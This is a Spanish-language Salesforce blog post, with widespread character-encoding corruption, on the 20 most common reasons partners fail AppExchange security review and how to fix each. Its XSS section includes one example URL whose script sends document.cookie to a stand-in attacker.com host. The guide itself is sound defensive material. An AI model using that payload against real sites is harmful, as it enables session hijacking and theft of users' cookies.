Se sabe que la revisi贸n de seguridad de AppExchange es uno de los procesos de revisi贸n m谩s rigurosos de cualquier mercado de aplicaciones en l铆nea. Esta estricta reputaci贸n es algo de lo que Salesforce se enorgullece, siendo la confianza nuestro valor n煤mero uno. Como mercado de software empresarial, tenemos la profunda responsabilidad de cumplir con los m谩s altos est谩ndares de seguridad posibles para la protecci贸n de los datos de los clientes.

Dicho esto, estos est谩ndares pueden representar un desaf铆o importante para los socios ISV que buscan publicar ofertas en AppExchange. Para ayudar a mejorar la transparencia y ayudarlos a todos a tener 茅xito, en orden de prevalencia, esta publicaci贸n analizar谩 las 20 razones principales por las que los socios no pasan la revisi贸n de seguridad (a partir de 2023). Tambi茅n cubriremos c贸mo remediar o prevenir estos problemas.

#1 鈥 Aplicaci贸n de CRUD/FLS

驴Qu茅 es esto?

Las vulnerabilidades de aplicaci贸n de la seguridad a nivel de objetos y campos (CRUD/FLS) son la raz贸n principal (por un margen significativo) para no pasar la revisi贸n de seguridad de AppExchange. Estas vulnerabilidades representan fallas al verificar adecuadamente si los objetos y/o campos son accesibles, creables, eliminables y/o actualizables antes de ejecutar consultas o acciones de base de datos. Si su oferta de AppExchange contiene alg煤n c贸digo de Salesforce, este problema debe ser su prioridad n煤mero uno a resolver antes de enviarlo para una revisi贸n de seguridad.

驴C贸mo puedo abordar esto?

Si, durante su proceso de codificaci贸n, no ha implementado consistentemente comprobaciones CRUD/FLS o no ha ejecutado SOQL, SOSL y DML en modo de usuario, querr谩 hacer una revisi贸n muy exhaustiva de su c贸digo base para asegurarse de que no est茅 realizar cualquier operaci贸n de creaci贸n/lectura/actualizaci贸n/eliminaci贸n no marcada en objetos o campos.

El m茅todo preferido y moderno para hacer cumplir CRUD/FLS implica utilizar el modo de usuario en todas las consultas y operaciones de bases de datos. La desventaja de esto es que Checkmarx, PMD y el motor de reglas PMD de Code Analyzer a煤n no lo admiten completamente (al momento de escribir esta publicaci贸n, PMD admite WITH USER_MODE en SOSL/SOQL, pero no el modo de usuario DML, por lo que si usa este tipo de protecci贸n arrojar谩 falsos positivos). Code Analyzer Graph Engine es actualmente la 煤nica herramienta que admite ambos tipos de modos de usuario. Consulte el comando scanner:run:dfa en la documentaci贸n para ejecutar un escaneo con Code Analyzer Graph Engine.

Si ha estado aplicando CRUD/FLS a la antigua usanza con Schema.DescribeSObjectResult (es decir, m茅todos como isCreatable() , isUpdateable() , isDeletable() ), entonces Code Analyzer y la extensi贸n PMD para VS Code pueden ser 煤tiles herramientas que puede utilizar para comprobar su c贸digo base. Puede seguir nuestra gu铆a para obtener m谩s informaci贸n sobre c贸mo utilizar PMD para VS Code y Code Analyzer para eliminar las infracciones CRUD/FLS.

El esc谩ner Checkmarx debe utilizarse como verificaci贸n final de violaciones de CRUD/FLS. Puede ejecutar este an谩lisis a trav茅s del Portal de seguridad para socios .

Obtenga m谩s informaci贸n sobre la aplicaci贸n de CRUD/FLS en Trailhead .

#2 鈥 Versi贸n de software insegura

驴Qu茅 es esto?

Esto significa que alguna pieza de software (normalmente, una versi贸n espec铆fica del software) utilizada en su oferta tiene vulnerabilidades de seguridad conocidas. La mayor铆a de las veces, es porque est谩s usando una versi贸n desactualizada de una biblioteca de JavaScript (por ejemplo, jQuery es, con diferencia, la m谩s com煤n), pero tambi茅n podr铆a ser algo as铆 como versiones antiguas de nginx, bibliotecas de Python, CKEditor o PHP.

驴C贸mo puedo abordar esto?

Intente identificar todas las bibliotecas, marcos, software y otras tecnolog铆as que no sean de Salesforce dentro del alcance de su oferta de AppExchange.

Busque cada uno de estos en Snyk (para proyectos de c贸digo abierto) o en la base de datos CVE . CVE significa "vulnerabilidades y exposiciones comunes" y la base de datos CVE representa un glosario de vulnerabilidades de seguridad conocidas p煤blicamente que es mantenido y operado por el FFRDC Nacional de Ciberseguridad de EE. UU. y MITRE Corporation. Tambi茅n puede utilizar el complemento RetireJS de Salesforce Code Analyzer para ejecutar un escaneo de su c贸digo base empaquetado para buscar bibliotecas de JavaScript con vulnerabilidades conocidas.

Nota: En algunos casos, puede agregar documentaci贸n de falsos positivos para argumentar que un CVE particular registrado no podr铆a aplicarse a su oferta, ya que quiz谩s no est茅 utilizando la funcionalidad asociada con ese CVE.

#3 鈥 Violaci贸n al compartir

驴Qu茅 es esto?

B谩sicamente, esto significa que tiene clases de Apex en las que no ha agregado expl铆citamente la palabra clave with sharing al encabezado de la clase, omitiendo as铆 las reglas de uso compartido de una organizaci贸n.

驴C贸mo puedo abordar esto?

Simplemente verifique todas sus clases de Apex y aseg煤rese de tener with sharing (o el uso compartido heredado) definido en el encabezado de la clase. Para los casos en los que necesita que una clase se ejecute sin compartir (por ejemplo, la clase debe ejecutarse en un contexto de sistema y no en un contexto de usuario), agregue una explicaci贸n a su documento de falso positivo que explique el caso de uso empresarial (e idealmente, agregue comentarios en la parte superior). de los encabezados de clase relevantes para que quede a煤n m谩s claro).

Code Analyzer , PMD para VS Code y Checkmarx tambi茅n pueden ayudarlo a escanear su c贸digo.

Obtenga m谩s informaci贸n sobre c贸mo compartir el cumplimiento a trav茅s de Trailhead .

#4: Almacenamiento inseguro de datos confidenciales

驴Qu茅 es esto?

Los secretos no deben estar codificados en el c贸digo fuente. Aunque el c贸digo puede estar contenido en un paquete administrado donde el c贸digo est谩 oculto para los clientes, todav铆a existen razones por las que esta es una pr谩ctica insegura, entre ellas:

  • El cliente debe tener control sobre sus secretos y claves y, en muchos casos, debe poder cambiarlos o actualizarlos.
  • Los secretos pueden quedar expuestos en registros o mensajes de error
  • Si un secreto o clave caduca, el cliente no podr谩 actualizarlo por s铆 mismo.

驴C贸mo puedo abordar esto?

Aseg煤rese de que no haya secretos codificados en el c贸digo fuente, incluso si es un paquete administrado. Aseg煤rese de que todos los secretos se almacenen de una de las siguientes maneras:

  • Campos de metadatos personalizados protegidos (para secretos propiedad de socios)
  • Configuraciones personalizadas protegidas (para secretos propiedad del suscriptor/cliente)
  • Credenciales con nombre (esto generalmente no se recomienda, pero si tiene un caso de uso espec铆fico que lo requiera, es posible que se permita caso por caso)
  • Cifrado y almacenado en objetos personalizados con la clave de cifrado almacenada en una configuraci贸n personalizada protegida o en un campo de metadatos personalizados ocultos

Obtenga m谩s informaci贸n sobre el almacenamiento seguro de secretos en Trailhead .

#5 鈥 Configuraci贸n TLS/SSL

驴Qu茅 es esto?

Todas las conexiones entrantes y salientes que involucran a sus comunidades, sitios y portales de Salesforce deben utilizar Transport Layer Security (TLS) 1.2. Este requisito es v谩lido en los modos Lightning Experience y Salesforce Classic para comunidades y sitios, independientemente de si est谩n en las ediciones Essentials, Enterprise, Performance, Unlimited o Developer.

驴C贸mo puedo abordar esto?

Verifique que el acceso a su navegador, las integraciones de API y otras funciones de Salesforce sean compatibles con TLS 1.2.

Una forma sencilla de hacerlo es utilizar Qualys SSL Scanner. El equipo de revisi贸n de seguridad ejecutar谩 este an谩lisis en todos y cada uno de los puntos finales externos o que no sean de Salesforce involucrados en su soluci贸n. Si sus terminales no reciben una calificaci贸n A por cumplimiento de SSL/TLS, su revisi贸n de seguridad no ser谩 aprobada.

Para ejecutar el escaneo, simplemente ingrese la URL base en el formulario web de prueba del servidor SSL de Qualys y presione Enviar.

Puede encontrar m谩s detalles sobre los requisitos de TLS en las notas de la versi贸n .

#6 鈥 Informaci贸n confidencial en depuraci贸n

驴Qu茅 es esto?

Este tipo de vulnerabilidad describe situaciones en las que se filtra informaci贸n confidencial, como secretos de aplicaciones, datos del sistema o informaci贸n de depuraci贸n demasiado detallada, a trav茅s de funciones de registro u otros flujos de salida. Por lo general, esto sucede cuando el registro detallado est谩 habilitado para fines de desarrollo, pero luego no se reduce adecuadamente antes de enviarlo para la revisi贸n de seguridad de AppExchange.

驴C贸mo puedo abordar esto?

En su paquete de Salesforce, aseg煤rese de buscar en su c贸digo fuente todas las declaraciones de depuraci贸n del paquete para asegurarse de que no registren informaci贸n confidencial o secretos.

Aseg煤rese de que los c贸digos de error y los mensajes de error en toda su soluci贸n tengan un nivel de informaci贸n apropiado para que todos los usuarios los vean. Por ejemplo, los usuarios habituales generalmente no deber铆an ver seguimientos de pila completos ni informaci贸n de depuraci贸n detallada. De manera similar, aseg煤rese de que otras funciones de registro o flujos de salida tampoco filtren datos confidenciales.

Code Analyzer y PMD para VS Code pueden ayudarlo a detectar estos problemas en las aplicaciones de Salesforce, y los esc谩neres de aplicaciones web como Burp Suite , Chimera u OWASP ZAP tambi茅n pueden ayudarlo a detectar estos problemas en sus integraciones externas y aplicaciones web.

Obtenga m谩s informaci贸n sobre c贸mo verificar los seguimientos de la pila e informaci贸n detallada sobre las excepciones en el n煤mero 13.

#7 – CSRF

驴Qu茅 es esto?

La falsificaci贸n de solicitudes entre sitios (CSRF) es un tipo de ataque que enga帽a a una v铆ctima para que ejecute acciones no deseadas en una aplicaci贸n web en la que est谩 autenticada. Explotar la confianza que un sitio tiene en el navegador del usuario puede llevar a acciones potencialmente da帽inas, como cambiar direcciones de correo electr贸nico y contrase帽as, o incluso realizar transacciones sin el conocimiento o consentimiento del usuario.

En la plataforma Salesforce, existe un token anti-CSRF para contrarrestar dichos ataques, que ofrece protecci贸n mientras se utilizan controladores y m茅todos est谩ndar. Sin embargo, los desarrolladores pueden eludir involuntariamente estas salvaguardas anti-CSRF al crear sus propios m茅todos de acci贸n.

驴C贸mo puedo abordar esto?

En general, las aplicaciones web pueden prevenir ataques CSRF principalmente implementando tokens anti-CSRF, que son valores 煤nicos y espec铆ficos del usuario incluidos en cada solicitud de cambio de estado para verificar la fuente. Adem谩s, deben adoptar la pr谩ctica de cookies del mismo sitio, que impide que el navegador env铆e la cookie junto con solicitudes entre sitios, mitigando as铆 los riesgos de CSRF.

Para p谩ginas de Visualforce:

  • Al crear p谩ginas de Visualforce, evite utilizar solicitudes HTTP GET que cambien de estado; use POST o PUT para cambios de estado en su lugar
  • No ejecute acciones autom谩ticas ni cambie el estado (por ejemplo, operaciones DML) al cargar la p谩gina.
  • Otra t茅cnica de mitigaci贸n implica agregar una p谩gina de confirmaci贸n intermedia antes de realizar la acci贸n, donde el usuario puede confirmar que ten铆a la intenci贸n de realizar esa acci贸n.

Para componentes Lightning:

  • De manera similar a las p谩ginas de Visualforce, evite cambiar el estado o ejecutar acciones al cargar un componente Lightning, mediante enlaces como init (para Aura) ,connectedCallback , renderedCallback o constructor .

Al realizar llamadas API:

  • Para las API que no son de Salesforce, es posible que tambi茅n desee agregar su propio token CSRF.

CSRF es uno de los tipos de problemas de seguridad m谩s complicados, por lo que vale la pena invertir en aprender m谩s sobre 茅l en profundidad. Para los paquetes de Salesforce, existe excelente documentaci贸n para desarrolladores y un m贸dulo Trailhead como referencia.

Para otros tipos de aplicaciones web, es posible que desees consultar la documentaci贸n de OWASP .

Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas en sus aplicaciones web externas.

N.潞 8: secuencias de comandos entre sitios (XSS) almacenadas y reflejadas

驴Qu茅 es esto?

Los ataques de secuencias de comandos entre sitios (XSS) son problemas de inyecci贸n en los que se insertan secuencias de comandos da帽inas en sitios web confiables. Ocurren cuando un atacante explota una aplicaci贸n web para enviar c贸digo malicioso, a menudo un script del lado del cliente, a un usuario diferente. Estos ataques explotan fallas en aplicaciones web que utilizan entradas de usuario no validadas o codificadas en su salida.

En un ataque XSS, el navegador de un usuario desprevenido ejecuta el script malicioso, creyendo que proviene de una fuente confiable. Esto permite que el script acceda a cookies, tokens de sesi贸n u otros datos confidenciales almacenados en el navegador. Incluso puede modificar el contenido HTML de la p谩gina.

Los ataques XSS almacenados son de tipo persistente, en los que la aplicaci贸n web almacena la entrada maliciosa y luego se muestra a los usuarios. Los ataques XSS reflejados, por otro lado, generalmente ocurren cuando se inyecta c贸digo malicioso en una URL, que se ejecuta cuando un usuario hace clic en ella (por ejemplo: http://example.com/search?query=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script> ).

Los motivos por los que su aplicaci贸n podr铆a ser susceptible incluyen:

  • Entrada no validada : las aplicaciones pueden aceptar entradas del usuario y usarlas o mostrarlas en una p谩gina sin validarlas adecuadamente (para garantizar que no contenga c贸digo/scripts ejecutables).
  • Campos de texto enriquecido : almacenar entradas en campos RTF de Salesforce es riesgoso porque admiten contenido HTML, por lo que debe validar la entrada para evitar que se almacenen XSS.
  • P谩ginas de Visualforce : pueden ser susceptibles si utilizan entradas generadas por el usuario en el cuerpo HTML o en JavaScript sin un escape de entrada o codificaci贸n de salida adecuados.
  • Componentes web Aura y Lightning (LWC) : aunque tienen protecciones integradas contra XSS, los desarrolladores pueden evitar estas protecciones mediante cosas como el uso de la propiedad innerHTML , lwc:dom=鈥漨anual鈥 o el componente lightning:formattedRichText sin la validaci贸n de entrada adecuada.
  • Par谩metros de URL : las aplicaciones pueden usarlos directamente en el HTML o JavaScript de una p谩gina sin validaci贸n (lo que lleva a XSS reflejado).

驴C贸mo puedo abordar esto?

Su objetivo principal debe ser evitar la manipulaci贸n de DOM, pero tambi茅n recomendamos practicar el filtrado de entrada y la codificaci贸n de salida, que incluyen:

  • Evite la manipulaci贸n del modelo de objetos de documento (DOM): en su lugar, utilice t茅cnicas como directivas de plantilla y evite funciones de JavaScript potencialmente inseguras (por ejemplo, eval() , DOMParser.parseFromString() , Document.implementation.createHTMLDocument() , setTimeout() , setInterval() )
  • Filtrado de entrada: aseg煤rese de que la entrada del usuario no contenga c贸digo ejecutable mediante el uso de expresiones regulares y listas de bloqueo o listas de permitidos (por ejemplo, filtre los caracteres com煤nmente utilizados en el c贸digo, como '<', '>', comillas simples o dobles, ' /', ';', corchetes, par茅ntesis u operadores matem谩ticos o l贸gicos como '+', '&' o '-')
  • Codificaci贸n de salida : aseg煤rese de que si el c贸digo ejecutable pasara el filtrado de entrada, no se interprete como c贸digo al convertir caracteres "peligrosos" en versiones de texto inofensivas (por ejemplo, '&; debe convertirse a &amp; y '<' o '>' debe convertirse a &lt; y &gt;)

Este m贸dulo de Trailhead explica exactamente c贸mo mitigar XSS con estas t茅cnicas, y nuestra documentaci贸n para desarrolladores tambi茅n es 煤til aqu铆. Para obtener consejos espec铆ficos sobre la protecci贸n contra XSS en componentes Lightning, consulte la p谩gina Seguridad Lightning en la Gu铆a de codificaci贸n segura.

Para aplicaciones web que no son de Salesforce, tambi茅n puede consultar la documentaci贸n de OWASP para obtener consejos adicionales.

Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas.

#9: JavaScript no est谩 en recursos est谩ticos

驴Qu茅 es esto?

Muchos paquetes administrados por Salesforce no pasan la revisi贸n de seguridad por no almacenar JavaScript como recursos est谩ticos en sus paquetes y, en su lugar, se vinculan a archivos JavaScript alojados externamente con etiquetas <script> . La raz贸n principal de esta regla es que permite un control de versiones mucho m谩s seguro y garantiza la integridad de los archivos JavaScript en su paquete de Salesforce incluso si la fuente externa est谩 comprometida.

驴C贸mo puedo abordar esto?

Nuestra regla es que todos los recursos de script y estilo deben agregarse al paquete como recursos est谩ticos y luego cargarse con una etiqueta <apex:includeScript> en su p谩gina (para Visualforce) o un ltng:require en su .cmp o .app. marcado (para Aura).

Nota: Si tiene un LWC, defina los m贸dulos JavaScript que importe a su componente o use la funci贸n loadScript para cargar un archivo JavaScript de recursos est谩ticos.

Para paquetes que no son LWC, la mejor manera de verificar este problema es buscar manualmente su c贸digo fuente para asegurarse de que todas las bibliotecas de JavaScript est茅n almacenadas como recursos est谩ticos, no cargadas din谩micamente a trav茅s de hiperv铆nculos.

Para situaciones en las que esto no sea factible, recomendamos programar una cita en horario de oficina t茅cnica para analizar su caso de uso. Es posible obtener una excepci贸n en ciertos casos.

Obtenga m谩s informaci贸n sobre este problema en nuestra documentaci贸n para desarrolladores .

#10 鈥 Inyecci贸n SOQL

驴Qu茅 es esto?

La inyecci贸n SOQL es la versi贸n espec铆fica de Salesforce de la inyecci贸n SQL. Ocurre cuando una entrada no validada proporcionada por el usuario se inserta directamente en una consulta SOQL din谩mica. Si la entrada no est谩 validada, puede incluir comandos SOQL que modifican efectivamente la declaraci贸n SOQL y enga帽an a la aplicaci贸n para que ejecute comandos no deseados.

驴C贸mo puedo abordar esto?

La forma m谩s sencilla de evitar el problema es evitar consultas din谩micas en favor de consultas est谩ticas y utilizar variables vinculantes. De lo contrario, deber谩 validar estrictamente las entradas del usuario antes de usarlas en consultas mediante t茅cnicas como encasillamiento, lista blanca de entradas o escape.

Code Analyzer , PMD para VS Code y Checkmarx tambi茅n pueden ayudarlo a escanear su c贸digo.

Para obtener m谩s informaci贸n, consulte nuestro m贸dulo Trailhead o revise nuestra documentaci贸n para desarrolladores .

Para aplicaciones que no son de Salesforce, es posible que desee obtener m谩s informaci贸n sobre la inyecci贸n SQL en la gu铆a OWASP . Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudar a identificar problemas de inyecci贸n SQL.

#11 鈥 Lightning: carga CSS inadecuada

驴Qu茅 es esto?

Similar al problema de usar etiquetas <script> o <link> para cargar JavaScript en sus paquetes, usar etiquetas <link> o <style> para cargar CSS en lugar de <apex:stylesheet> (Visualforce) o <ltng:require> ( Aura) se considera una pr谩ctica insegura. Estas etiquetas <link> y <style> pueden hacer referencia a recursos externos o en l铆nea que contienen CSS o JavaScript, y la arquitectura de seguridad Lightning Web Security (LWS) de Salesforce no los controla ni los desinfecta.

Para los componentes de Aura, en particular, el uso de <ltng:require> tambi茅n permite a Salesforce aplicar correctamente las reglas de seguridad LWS y garantizar que el CSS que est谩 cargando est茅 correctamente aislado y no incluya c贸digo o estilos JavaScript no seguros que puedan afectar negativamente a otros. partes de su aplicaci贸n Salesforce.

驴C贸mo puedo abordar esto?

Para hacer referencia a un recurso CSS externo que haya subido como recurso est谩tico, use una etiqueta <apex:stylesheet> en su p谩gina (para Visualforce) o una etiqueta <ltng:require> en su marcado .cmp o .app (para Aura ). Busque el c贸digo fuente de su paquete para asegurarse de que no haya utilizado etiquetas <link> o <style> en ning煤n lugar para cargar recursos CSS.

Nota: Si tiene una LWC, no puede encontrarse con este problema de todos modos porque, al igual que las etiquetas <script> , las etiquetas <style> ya est谩n bloqueadas para su uso dentro de las plantillas HTML. En su lugar, incluir铆a su CSS en el archivo CSS asociado de su componente o usar铆a la funci贸n loadStyle para cargar un archivo CSS de recursos est谩ticos.

Puede encontrar m谩s informaci贸n en nuestra documentaci贸n para desarrolladores .

#12: JavaScript en Salesforce DOM (solo experiencia cl谩sica)

驴Qu茅 es esto?

Salesforce tiene reglas estrictas sobre el uso de JavaScript y una de esas reglas es que JavaScript no se puede ejecutar directamente dentro del contexto de la aplicaci贸n Salesforce. Esto significa que no puede incluir bloques de JavaScript directamente dentro de los componentes que se ejecutan en Salesforce DOM, como HomePageComponents, WebLinks, Custom Buttons, etc.

En cambio, todo JavaScript debe residir bajo el dominio de espacio de nombres de su aplicaci贸n en las p谩ginas de Visualforce que usted controla, de modo que el JavaScript personalizado est茅 esencialmente aislado del DOM principal de Salesforce. Eso significa que no puede usar JavaScript para crear botones personalizados, pesta帽as web, componentes de p谩gina de inicio y elementos similares (por ejemplo, incluir controladores de eventos de JavaScript onclick en botones personalizados podr铆a ser motivo de falla).

驴C贸mo puedo abordar esto?

Esto es algo que deber谩 verificar manualmente en el c贸digo fuente de su paquete Salesforce. Verifique y aseg煤rese de que no haya utilizado JavaScript para crear botones personalizados, pesta帽as web, componentes de la p谩gina de inicio u otros elementos similares, y verifique que cualquier JavaScript personalizado est茅 incluido solo en el dominio de su aplicaci贸n con espacio de nombres en las p谩ginas de VisualForce que controla como parte de su aplicaci贸n.

Una forma de verificar esto es buscar el texto <openType>onClickJavaScript</openType> en los archivos de metadatos de la aplicaci贸n (a menudo en archivos XML como weblink/something.weblink) y, si lo encuentra, aseg煤rese de eliminarlo. Incluso si su aplicaci贸n solo est谩 destinada a usarse en Lightning Experience, si la vulnerabilidad est谩 presente para los usuarios en modo Cl谩sico, el paquete no se puede aprobar.

Esta regla en particular no est谩 especialmente bien documentada, pero puede leer m谩s en el documento Lista de verificaci贸n de revisi贸n de seguridad de AppExchange (se requiere iniciar sesi贸n en la comunidad de socios).

#13 鈥 Divulgaci贸n de informaci贸n en p谩ginas de error y excepciones

驴Qu茅 es esto?

En el contexto de la revisi贸n de seguridad de AppExchange, este t茅rmino se refiere espec铆ficamente a situaciones (generalmente en aplicaciones o servicios web que no son de Salesforce o fuera de plataforma) donde sus p谩ginas de error muestran datos confidenciales del sistema o informaci贸n de depuraci贸n. Por ejemplo, a veces las p谩ginas de error incluyen seguimientos de pila completos que muestran c贸mo se hace referencia internamente a los objetos o rutas de archivo relativas al lugar donde est谩 instalada la aplicaci贸n. A veces, incluso la informaci贸n confidencial queda expuesta de esta manera.

驴C贸mo puedo abordar esto?

Busque en su base de c贸digo llamadas que causen excepciones o que los seguimientos de pila se representen en cadenas o flujos de salida, y realice pruebas que puedan causar errores, como entradas no v谩lidas, entradas vac铆as, entradas demasiado largas, acceso a p谩ginas internas sin autenticaci贸n, omisi贸n de aplicaciones. flujo, etc

La herramienta de fuzzing de Burp Suite puede ser una gran ayuda en este caso.

Tambi茅n puede obtener excelentes consejos para realizar pruebas de seguimiento de pila a trav茅s de esta gu铆a de OWASP .

#14 鈥 Componentes de Aura: componente externo de CSS

驴Qu茅 es esto?

Se supone que los componentes de Aura son peque帽os, aut贸nomos, reutilizables y reposicionables. CSS que evita la encapsulaci贸n de componentes (a trav茅s de .THIS) o que utiliza un posicionamiento no est谩ndar (por ejemplo, flotante o posici贸n: absoluta o fija) infringe estas garant铆as y puede interferir con la visualizaci贸n de otros componentes. En particular, el uso del posicionamiento absoluto en CSS es la raz贸n principal de este tipo de falla.

Si bien esto puede no parecer un problema de seguridad a primera vista, puede alterar el dise帽o del sitio web de Salesforce y viola el esp铆ritu del modelo de seguridad de Lightning, donde los componentes est谩n estrictamente aislados y se garantiza que permanecer谩n en su propio carril.

驴C贸mo puedo abordar esto?

Este es otro problema que debes verificar manualmente. B谩sicamente, busque en el CSS de su componente Aura, especialmente para posicionamiento absoluto/fijo o ancho y alto fijos. Tambi茅n recomendamos revisar nuestra documentaci贸n para asegurarse de que est谩 siguiendo todas las reglas CSS correctas.

#15 鈥 Canal de mensajes expuesto

驴Qu茅 es esto?

Este t茅rmino se refiere espec铆ficamente a los casos en los que no ha configurado el indicador isExposed en Lightning Message Channel en falso. Dado que esto proporciona acceso a la API del Servicio de mensajes Lightning (LMS), que le permite publicar y suscribirse a mensajes en todo el DOM y entre Aura, Visualforce y Lightning Web Components, debe establecerse en falso a menos que sea realmente necesario.

驴C贸mo puedo abordar esto?

Tiene dos opciones, seg煤n su caso de uso, que incluyen:

  1. Registre un ticket de soporte para solicitar que se habilite la eliminaci贸n de componentes administrados para su paquete u organizaci贸n de Dev Hub y elimine el componente del paquete. Si no puede hacerlo (por ejemplo, si esto afectar铆a la funcionalidad de los suscriptores que dependen de canales de mensajes expuestos), puede dejar el componente en el paquete y simplemente no usarlo (aseg煤rese de mencionar esto espec铆ficamente en un mensaje falso). documento positivo sobre su presentaci贸n).
  2. Si tiene que utilizar un componente de canal LMS, aseg煤rese de tener isExposed=false . Esto debe hacerse creando un nuevo componente de canal LMS porque los componentes existentes con isExposed=true no pueden cambiar isExposed=false . Utilice 煤nicamente el componente reci茅n creado en el c贸digo.

M谩s informaci贸n est谩 disponible en la documentaci贸n .

#16 鈥 Informaci贸n confidencial en URL

驴Qu茅 es esto?

Esto se refiere a una situaci贸n en la que se env铆a informaci贸n confidencial de larga duraci贸n en URL (por ejemplo, un ID o secreto de cliente, o un nombre de usuario/contrase帽a). En realidad, esto puede llevar a que se filtren secretos a largo plazo de varias maneras posibles. Por ejemplo:

  • Las URL completas a menudo se almacenan en servidores en registros de texto sin cifrar que pueden no almacenarse de forma segura y pueden ser vistos por el personal o comprometidos por un tercero.
  • Los motores de b煤squeda indexan URL y almacenan inadvertidamente informaci贸n confidencial
  • Almacenamiento de rutas URL completas en el historial del navegador local, cach茅 del navegador, marcadores y marcadores sincronizados entre dispositivos
  • Informaci贸n de URL enviada a aplicaciones web de terceros a trav茅s del encabezado de referencia o expuesta a scripts de terceros en la p谩gina

驴C贸mo puedo abordar esto?

Burp Suite puede ayudarle aqu铆 para aplicaciones web que no sean de Salesforce o fuera de plataforma, pero en general recomendamos comprobar manualmente su aplicaci贸n para detectar cualquier caso en el que se env铆en secretos a largo plazo a trav茅s de URL. Dependiendo de su caso de uso, es posible que deba realizar cambios, como usar solicitudes POST en lugar de solicitudes GET, cambiar su m茅todo de autenticaci贸n (OAuth 2.0 es generalmente ideal) y emplear cifrado y mejores m茅todos de almacenamiento de secretos.

La gu铆a OWASP es un gran recurso a seguir.

#17 鈥 Punto final inseguro

驴Qu茅 es esto?

El nombre de esta vulnerabilidad simplemente se refiere a situaciones en las que se utiliza HTTP en lugar de HTTPS.

驴C贸mo puedo abordar esto?

Las herramientas de escaneo pueden ser de ayuda, pero una forma a煤n m谩s segura de verificar esto es buscar en el c贸digo fuente enlaces HTTP y cambiarlos a HTTPS. Puede aprender un poco m谩s sobre c贸mo esto mejora la seguridad en esta p谩gina de OWASP .

#18 鈥 Enumeraci贸n de nombre de usuario o correo electr贸nico

驴Qu茅 es esto?

Por lo general, este problema solo surge en aplicaciones web externas fuera de la plataforma Salesforce. Se refiere a una situaci贸n en la que los atacantes pueden enumerar listas de nombres de usuario o correos electr贸nicos de su base de usuarios, generalmente analizando cambios en mensajes de error en funciones de inicio de sesi贸n, funciones de olvido de contrase帽a o registros de cuentas. Los atacantes suelen hacer esto para poder comprobar si hay contrase帽as reutilizadas de bases de datos comprometidas y fugas o volcados de contrase帽as.

驴C贸mo puedo abordar esto?

Verifique sus mensajes de error para registros de cuentas, recuperaci贸n de contrase帽as, intentos de inicio de sesi贸n, etc., y aseg煤rese de que su mensaje de error sea el mismo independientemente de si el nombre de usuario o el correo electr贸nico ingresado es v谩lido.

Por ejemplo, muchos sitios incluyen un mensaje gen茅rico, como: "Si dicho usuario existe, recibir谩 un correo electr贸nico con un restablecimiento de contrase帽a". Este tipo de mensaje general evita confirmar la existencia de un nombre de usuario o correo electr贸nico.

Por supuesto, en determinadas situaciones, puede ser inevitable (por ejemplo, durante el registro de una cuenta, es posible que deba confirmar que se ha utilizado un nombre de usuario). En esas situaciones, intente implementar controles que impidan la enumeraci贸n por fuerza bruta, como captchas para evitar que los robots eliminen su formulario de registro.

Burp Suite es una excelente herramienta para verificar esto, pero si no la tiene, tambi茅n puede revisar sus funcionalidades de inicio de sesi贸n manualmente.

OWASP tiene una gu铆a 煤til para evitar la enumeraci贸n de correos electr贸nicos y nombres de usuarios.

#19 鈥 Gesti贸n de contrase帽as

驴Qu茅 es esto?

En ocasiones, el equipo de seguridad falla en sitios y aplicaciones web externos (que no sean Salesforce) por tener pol铆ticas de contrase帽as problem谩ticas, como por ejemplo:

  • Permitir la reutilizaci贸n de la misma contrase帽a cuando es necesario restablecerla
  • No solicitar la contrase帽a anterior cuando se permite a los usuarios establecer una nueva contrase帽a
  • Para restablecer la contrase帽a, enviar una contrase帽a temporal al correo electr贸nico de un usuario en texto sin formato
  • Dejar contrase帽as predeterminadas en los usuarios ra铆z del servidor o de la base de datos

驴C贸mo puedo abordar esto?

Adem谩s de evitar las situaciones anteriores, consulte la Hoja de referencia de autenticaci贸n de OWASP para obtener algunas pautas sobre c贸mo establecer pol铆ticas de contrase帽as seguras:

Burp Suite tambi茅n es muy 煤til para identificar problemas relacionados con las contrase帽as (por ejemplo, puede usarlo para intentar forzar sus p谩ginas de inicio de sesi贸n).

#20 鈥 Eco de contrase帽a

驴Qu茅 es esto?

Esto es un poco diferente del problema de administraci贸n de contrase帽as descrito anteriormente. Un eco de contrase帽a se refiere a situaciones en las que las contrase帽as se reflejan en texto sin formato en la interfaz de usuario (como cuando el usuario visita su propia p谩gina de configuraci贸n) o en llamadas API/respuestas JSON.

驴C贸mo puedo abordar esto?

Aseg煤rese de que su contrase帽a no se revele ni se transmita en texto sin formato en ninguna parte de su aplicaci贸n. Aseg煤rese de que en las p谩ginas de configuraci贸n u otras p谩ginas que muestran secretos, se muestren solo como asteriscos (se pueden mostrar al hacer clic en el bot贸n si es necesario).

Consulte la hoja de referencia sobre almacenamiento de contrase帽as de OWASP para obtener m谩s informaci贸n.

Burp Suite , o quiz谩s Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas.

Recursos adicionales

Si su soluci贸n incluye sitios web o aplicaciones web personalizados que no son de Salesforce, le recomendamos encarecidamente invertir en una licencia de Burp Suite si es financieramente viable para su organizaci贸n. Burp Suite es una de las mejores herramientas de seguridad del mercado y tambi茅n la utiliza mucho nuestro propio equipo de seguridad de productos. Chimera u OWASP ZAP son alternativas completamente gratuitas, pero prep谩rate para invertir m谩s tiempo en t茅rminos de revisi贸n manual, ya que carecen de muchas de las potentes funciones/herramientas que tiene Burp Suite.

Nota: Si su oferta se integra con aplicaciones o servicios web que no son de su propiedad, no intente escanear los puntos finales hasta que haya obtenido el permiso del propietario.

Salesforce Product Security tambi茅n utiliza Code Analyzer , PMD para VS Code y Checkmarx para revisar el c贸digo fuente del paquete Salesforce. Tambi茅n utilizan la base de datos CVE y el esc谩ner Qualys SSL en la mayor铆a de los env铆os.

Si tiene problemas de seguridad y necesita orientaci贸n t茅cnica, los socios ISV pueden registrarse para obtener horas de oficina gratuitas con nuestros ingenieros de seguridad a trav茅s del Portal de seguridad para socios .

